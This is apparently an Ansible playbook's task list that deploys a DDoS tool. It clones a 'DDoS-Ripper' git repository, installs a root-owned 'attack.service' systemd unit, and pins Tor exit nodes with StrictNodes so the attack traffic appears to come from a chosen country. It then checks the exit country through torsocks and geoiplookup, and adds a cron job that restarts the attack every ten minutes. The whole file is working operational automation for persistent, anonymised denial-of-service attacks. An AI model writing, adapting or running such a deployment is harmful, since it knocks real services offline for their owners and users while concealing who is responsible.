---
 - name: "Create a directory for DDoS project"
   file:
     path: "{{ git_dest }}"
     state: directory
     mode: '0755'

 - name: "Clone git repository for DDoS-Ripper"
   git:
     repo: "{{ git_repo }}"
     dest: "{{ git_dest }}"

 - name: "Copy attack.service"
   template:
     src: "attack.service.j2"
     dest: "/etc/systemd/system/attack.service"
     owner: root
     group: root
     mode: '0644'

 - name: "Update repositories cache and install common software"
   apt:
     name: "{{ soft }}"
     state: latest
     update_cache: yes

 - name: "Add socks config for exit nodes"
   lineinfile:
     path: /etc/tor/torrc
     state: present
     regexp: '^ExitNodes\s'
     line: "{{ ExitNodes }}"

 - name: "Add socks config for exit nodes"
   lineinfile:
     path: /etc/tor/torrc
     state: present
     regexp: '^StrictNodes\s'
     line: 'StrictNodes 1'

 - name: "Restart tor service"
   systemd:
     state: restarted
     name: tor

 - name: "Check outgoing country"
   shell: geoiplookup $(torsocks curl -s ifconfig.me)
   register: country

 - debug:
     var: country

 - name: "Restart attack service"
   systemd:
     state: restarted
     daemon_reload: yes
     name: attack.service

 - name: "Cron restart attack service"
   cron:
     name: "restart attack service"
     minute: "*/10"
     job: "systemctl restart attack.service"